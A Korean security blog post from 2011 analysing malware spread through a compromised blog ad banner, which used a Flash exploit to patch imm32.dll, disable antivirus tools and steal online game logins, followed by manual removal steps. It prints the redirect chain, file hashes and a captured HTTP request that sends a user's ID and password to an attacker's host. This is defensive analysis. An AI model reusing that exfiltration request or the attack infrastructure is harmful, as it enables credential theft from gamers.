울지않는벌새 : Security, Movie & Society

블로그 광고 배너를 통한 imm32.dll, shell64.dll 악성코드 유포 (2011.7.30)

벌새::Analysis
저번 주말부터 블로그 광고 배너를 이용한 악성코드 유포 행위가 이번 주 금요일 밤부터 또 다시 유포가 이루어지고 있는 것을 확인하였습니다.

특히 토요일 오후경 해당 광고 배너 업체에서 해킹된 악성 스크립트를 제거하였지만 현재는 변경된 악성 스크립트를 이용하여 새로운 악성코드 유포가 진행되고 있습니다.


[악성코드 유포 경로]

h**p://banner.**get.co.kr/ads/adgetS2.js
 ㄴ h**p://bn.weather*.co.kr/images/x/win.html
   ㄴ h**p://bn.weather*.co.kr/images/x/q.html
     ㄴ h**p://bn.weather*.co.kr/images/x/v3.htm
       ㄴ h**p://bn.weather*.co.kr/images/x/main.swf
         ㄴ h**p://dos357.**conn.net/css/q729.css :: 암호화
     ㄴ h**p://bn.weather*.co.kr/images/x/e.html
       ㄴ h**p://dos357.**conn.net/css/q729.css :: 암호화
       ㄴ h**p://bn.weather*.co.kr/images/x/e.swf
         ㄴ h**p://bn.weather*.co.kr/images/x/MyLover.swf
   ㄴ h**p://bn.weather*.co.kr/images/x/w.html
     ㄴ h**p://bn.weather*.co.kr/images/x/w.js
   ㄴ h**p://js.tongji.linezing.com/2259080/tongji.js


사용자 PC 감염을 유발하는 악성 스크립트를 살펴보면 Adobe Flash Player 취약점 CVE-2011-2110을 이용한 main.swf 파일에 대하여 하우리 바이로봇(Hauri ViRobot) 보안 제품에서는 SWF.S.Exploit.3845.A 진단명으로 진단되고 있으며, e.swf 파일에 대하여 하우리 바이로봇(Hauri ViRobot) 보안 제품에서는 SWF.S.Exploit.1715.A 진단명으로 진단되고 있습니다.

또한 e.html 파일에 대하여 하우리 바이로봇(Hauri ViRobot) 보안 제품에서는 HTML.S.Exploit.11277 진단명으로 진단되고 있으며, w.html 파일에 대하여 Norman 보안 제품에서 JS/ShellCode.B 진단명으로 진단되고 있습니다.

이들 악성코드에 감염되는 환경은 Adobe Flash Player 최신 버전 미사용자 또는 Windows 보안 패치가 적용되지 않은 경우에 발생하므로 반드시 최신 업데이트를 체크하여 모두 설치를 하시기 바랍니다.

최종적으로 다운로드된 파일(MD5 : a220ad379e773a649208d0d966d7cd9f)에 대하여 알약(ALYac) 보안 제품에서는 Trojan.Spy.Agent.OBE (VirusTotal : 26/42) 진단명으로 진단되고 있습니다.


[생성 / 변경 파일 및 진단 정보]

C:\WINDOWS\system32\imm32.dll :: 변경 전 파일 크기 - 110,080 Bytes / 변경 후 파일 크기 - 109,568 Bytes
 - MD5 : f2ef9702e798de5895f185a9026e911d
 - nProtect : Trojan/W32.Forwarded.Gen (VirusTotal : 11/42)

C:\WINDOWS\system32\imm32.dll.eDxj.tmp :: imm32.dll 백업 파일(정상 파일)
※ 해당 파일은 imm32.dll.(4자리 영문+숫자).tmp 형태의 파일입니다.

C:\WINDOWS\system32\shell64.dll :: imm32.dll 백업 파일(정상 파일)


해당 악성코드는 기존의 imm32.dll(Windows XP IMM32 API Client DLL) 시스템 파일 패치와는 다른 방식으로 다음과 같은 방식으로 악의적인 동작을 하고 있습니다.

생성된 파일을 확인해보면 imm32.dll 시스템 파일을 패치하여 악성 파일로 변경하고 imm32.dll 기능을 하는 파일을 shell64.dll 파일로 백업 생성하는 것을 확인할 수 있습니다.

악성 imm32.dll 파일의 EAT(Export Address Table)을 확인해보면 원래 imm32.dll 파일의 특정 함수를 shell64.dll 백업 파일에서 불러오는 것을 확인할 수 있습니다.

또한 imm32.dll 파일과 shell64.dll 파일은 동일한 모습과 비슷한 파일 크기로 구성될 수 있으므로 사용자는 파일 수정 날짜로 구분하시기 바랍니다.

참고로 정상 imm32.dll 파일과 패치된 imm32.dll 악성 파일의 Section Header 정보를 살펴보면 bss, rdata 섹션이 추가되어 있는 것을 확인할 수 있습니다.

감염된 환경에서 imm32.dll 역할을 하는 shell64.dll 파일이 프로세스가 추가되며, 악성 imm32.dll 파일 역시 사용자가 Internet Explorer 웹 브라우저를 실행할 경우 추가되어 안철수연구소(AhnLab) V3, 알약(ALYac) 보안 제품의 AVKiller 기능 및 온라인 게임 계정(아이온, 다크블러드, 마에스티아, 한게임, 넷마블 등) 수집 및 외부 유출과 같은 악의적인 동작을 합니다.

프로그램에서 지정한 특정 온라인 게임에 접속하여 로그인을 시도할 경우 미국(USA)에 위치한 173.244.209.183 IP로 계정 정보가 유출됩니다.


[한게임 계정 정보 수집 예시]

GET /hg/post.asp?Game=08&para=q729-xxx&ves=009&d00=HANGAME&d01=HANGAME&d10=(사용자 ID)&d11=(사용자 비밀번호)&d21=&d30=~(생략)~=0&d50=&d90=1915 HTTP/1.1
User-Agent: IE6.0
Host: q729.fd6a4r8rk.com


해당 악성코드에 감염된 사용자 중 수동으로 문제를 해결하기 위해서는 다음과 같은 절차에 따르시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)

1. C:\WINDOWS\system32\imm32.dll 파일을 imm32.dll- 형태로 확장자를 변경하시기 바랍니다.(※ 파일 확장자를 변경한 경우 윈도우 파일 보호(WFP) 기능을 통해 자동으로 imm32.dll 정상 시스템 파일이 복원됩니다.)

2. C:\WINDOWS\system32\shell64.dll 파일을 shell64.dll- 형태로 확장자를 변경하시기 바랍니다.

3. 반드시 시스템 재부팅을 합니다.

4. 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\imm32.dll-
  • C:\WINDOWS\system32\imm32.dll.eDxj.tmp
  • C:\WINDOWS\system32\shell64.dll-

이번과 같이 감염시 정상적인 파일로 점점 사용자의 눈을 속이고 있기 때문에 분석 목적이 아닌 경우 쉽게 악성 파일 감염 여부를 확인하기 매우 어려우므로, 사용자 PC에 설치된 소프트웨어에 대한 업데이트를 주기적으로 체크하는 습관이 필요하겠습니다.